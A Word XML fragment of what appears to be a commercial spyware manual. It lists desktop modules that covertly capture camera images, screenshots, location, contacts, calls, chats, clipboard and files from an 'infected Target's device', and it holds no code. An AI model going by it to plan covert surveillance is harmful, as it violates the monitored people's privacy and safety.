      <w:bookmarkStart w:id="16" w:name="_Toc372642489"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Desktop Modules Configuration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w:rsidR="00785BC7" w:rsidRDefault="00785BC7" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0023442F" w:rsidRDefault="0023442F" w:rsidP="0023442F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Within a Desktop Factory there’re 18 different Modules available.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB646B" w:rsidRDefault="00FB646B" w:rsidP="0023442F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Each Module represents a specific type of data that can be collected from the infected Target’s device, except 2 Modules (Crisis and Infection) that do not provide any evidence and are used for different purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0023442F" w:rsidRDefault="0023442F" w:rsidP="0023442F">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238"/>
        <w:gridCol w:w="8499"/>
      </w:tblGrid>
      <w:tr w:rsidR="0023442F" w:rsidTr="0023442F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="891" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0023442F" w:rsidRDefault="0023442F" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="675" w:dyaOrig="675">
                <v:shape id="_x0000_i1048" type="#_x0000_t75" style="width:33pt;height:33pt" o:ole="">
                  <v:imagedata r:id="rId138" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1048" DrawAspect="Content" ObjectID="_1446455263" r:id="rId139"/>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Camera</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0023442F" w:rsidRPr="00671455" w:rsidRDefault="00D056EB" w:rsidP="00D056EB">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D056EB">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Camera </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="00D056EB">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>odule captures image</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="00D056EB">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> from the built-in camera</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> of the infected Target’s device.</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13B1B" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="675" w:dyaOrig="675">
                <v:shape id="_x0000_i1049" type="#_x0000_t75" style="width:33pt;height:33pt" o:ole="">
                  <v:imagedata r:id="rId140" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1049" DrawAspect="Content" ObjectID="_1446455264" r:id="rId141"/>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Device</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0023442F" w:rsidRPr="00671455" w:rsidRDefault="00F80224" w:rsidP="00F80224">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F80224">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Device </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="00F80224">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">odule records system information </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">from the infected Target’s device </w:t>
            </w:r>
            <w:r w:rsidRPr="00F80224">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">e.g. </w:t>
            </w:r>
            <w:r w:rsidRPr="00F80224">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">processor type, memory in use, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">O.S. </w:t>
            </w:r>
            <w:r w:rsidRPr="00F80224">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>installed</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00F80224">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>root privileges).</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13B1B" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="675" w:dyaOrig="675">
                <v:shape id="_x0000_i1050" type="#_x0000_t75" style="width:33pt;height:33pt" o:ole="">
                  <v:imagedata r:id="rId142" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1050" DrawAspect="Content" ObjectID="_1446455265" r:id="rId143"/>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Position</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0023442F" w:rsidRPr="00671455" w:rsidRDefault="00185EC8" w:rsidP="00185EC8">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00185EC8">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Position </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="00185EC8">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">odule records the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">infected Target’s </w:t>
            </w:r>
            <w:r w:rsidRPr="00185EC8">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">device </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">geographic </w:t>
            </w:r>
            <w:r w:rsidRPr="00185EC8">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">position using </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Wi</w:t>
            </w:r>
            <w:r w:rsidR="008E44B2">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Fi </w:t>
            </w:r>
            <w:r w:rsidRPr="00185EC8">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>information.</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13B1B" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="675" w:dyaOrig="675">
                <v:shape id="_x0000_i1051" type="#_x0000_t75" style="width:33pt;height:33pt" o:ole="">
                  <v:imagedata r:id="rId144" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1051" DrawAspect="Content" ObjectID="_1446455266" r:id="rId145"/>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Screenshot</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0023442F" w:rsidRPr="00671455" w:rsidRDefault="00EE7ABA" w:rsidP="00EE7ABA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE7ABA">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Screenshot </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE7ABA">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">odule captures the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">infected Target’s device </w:t>
            </w:r>
            <w:r w:rsidRPr="00EE7ABA">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>screen image.</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13B1B" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="675" w:dyaOrig="675">
                <v:shape id="_x0000_i1052" type="#_x0000_t75" style="width:33pt;height:33pt" o:ole="">
                  <v:imagedata r:id="rId146" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1052" DrawAspect="Content" ObjectID="_1446455267" r:id="rId147"/>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Addressbook</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0023442F" w:rsidRPr="00671455" w:rsidRDefault="00AE1D66" w:rsidP="00EB07A6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE1D66">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Addressbook </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="00AE1D66">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">odule records all the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>person-records information founded within supported applications and services (e.g. Skype, Gmail, Facebook, Twitter)</w:t>
            </w:r>
            <w:r w:rsidRPr="00AE1D66">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</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13B1B" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="675" w:dyaOrig="675">
                <v:shape id="_x0000_i1053" type="#_x0000_t75" style="width:33pt;height:33pt" o:ole="">
                  <v:imagedata r:id="rId148" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1053" DrawAspect="Content" ObjectID="_1446455268" r:id="rId149"/>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Application</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0023442F" w:rsidRPr="00671455" w:rsidRDefault="000F2CBB" w:rsidP="000F2CBB">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000F2CBB">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Application </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="000F2CBB">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>odule records name</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="000F2CBB">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> and information </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">about all </w:t>
            </w:r>
            <w:r w:rsidRPr="000F2CBB">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">processes </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">started and stopped </w:t>
            </w:r>
            <w:r w:rsidR="00385385">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">on </w:t>
            </w:r>
            <w:r w:rsidRPr="000F2CBB">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>infected T</w:t>
            </w:r>
            <w:r w:rsidRPr="000F2CBB">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>arget</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>’s device.</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13B1B" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="675" w:dyaOrig="675">
                <v:shape id="_x0000_i1054" type="#_x0000_t75" style="width:33pt;height:33pt" o:ole="">
                  <v:imagedata r:id="rId150" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1054" DrawAspect="Content" ObjectID="_1446455269" r:id="rId151"/>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Call</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0023442F" w:rsidRPr="00671455" w:rsidRDefault="004C7300" w:rsidP="00385385">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004C7300">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Call </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="004C7300">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>odule captures audio and information (start time, length, caller and called numbers) for</w:t>
            </w:r>
            <w:r w:rsidR="00385385">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> a</w:t>
            </w:r>
            <w:r w:rsidRPr="004C7300">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ll</w:t>
            </w:r>
            <w:r w:rsidR="00385385">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004C7300">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">calls made and received by the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>infected T</w:t>
            </w:r>
            <w:r w:rsidRPr="004C7300">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>arget</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>’s device</w:t>
            </w:r>
            <w:r w:rsidRPr="004C7300">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</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13B1B" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="675" w:dyaOrig="675">
                <v:shape id="_x0000_i1055" type="#_x0000_t75" style="width:33pt;height:33pt" o:ole="">
                  <v:imagedata r:id="rId152" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1055" DrawAspect="Content" ObjectID="_1446455270" r:id="rId153"/>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Chat</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0023442F" w:rsidRPr="00671455" w:rsidRDefault="00A540B3" w:rsidP="00A540B3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A540B3">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Chat </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="00A540B3">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">odule records </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>the entire chat sessions on the infected Target’s device.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F0B7A" w:rsidRPr="006172B5" w:rsidTr="001F6D35">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="891" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001F0B7A" w:rsidRPr="006172B5" w:rsidRDefault="001F0B7A" w:rsidP="001F6D35">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="238" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001F0B7A" w:rsidRPr="006172B5" w:rsidRDefault="001F0B7A" w:rsidP="001F6D35">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001F0B7A" w:rsidRPr="006172B5" w:rsidRDefault="001F0B7A" w:rsidP="001F6D35">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F0B7A" w:rsidRPr="005701FD" w:rsidTr="001F6D35">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="891" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="001F0B7A" w:rsidRPr="005701FD" w:rsidRDefault="001F0B7A" w:rsidP="001F6D35">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="238" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="001F0B7A" w:rsidRPr="005701FD" w:rsidRDefault="001F0B7A" w:rsidP="001F6D35">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="001F0B7A" w:rsidRPr="005701FD" w:rsidRDefault="001F0B7A" w:rsidP="001F6D35">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E7386" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="675" w:dyaOrig="675">
                <v:shape id="_x0000_i1056" type="#_x0000_t75" style="width:33pt;height:33pt" o:ole="">
                  <v:imagedata r:id="rId154" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1056" DrawAspect="Content" ObjectID="_1446455271" r:id="rId155"/>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Clipboard</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0023442F" w:rsidRPr="00671455" w:rsidRDefault="00A250C3" w:rsidP="00A250C3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A250C3">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Clipboard </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="00A250C3">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">odule saves the content </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>of the clipboard in text format.</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1F0B7A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="891" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="0023442F" w:rsidRPr="005701FD" w:rsidRDefault="0023442F" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="238" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="0023442F" w:rsidRPr="005701FD" w:rsidRDefault="0023442F" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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E7386" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="675" w:dyaOrig="675">
                <v:shape id="_x0000_i1057" type="#_x0000_t75" style="width:33pt;height:33pt" o:ole="">
                  <v:imagedata r:id="rId156" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1057" DrawAspect="Content" ObjectID="_1446455272" r:id="rId157"/>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File</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0023442F" w:rsidRPr="00671455" w:rsidRDefault="00095D52" w:rsidP="00095D52">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00095D52">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The File </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="00095D52">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
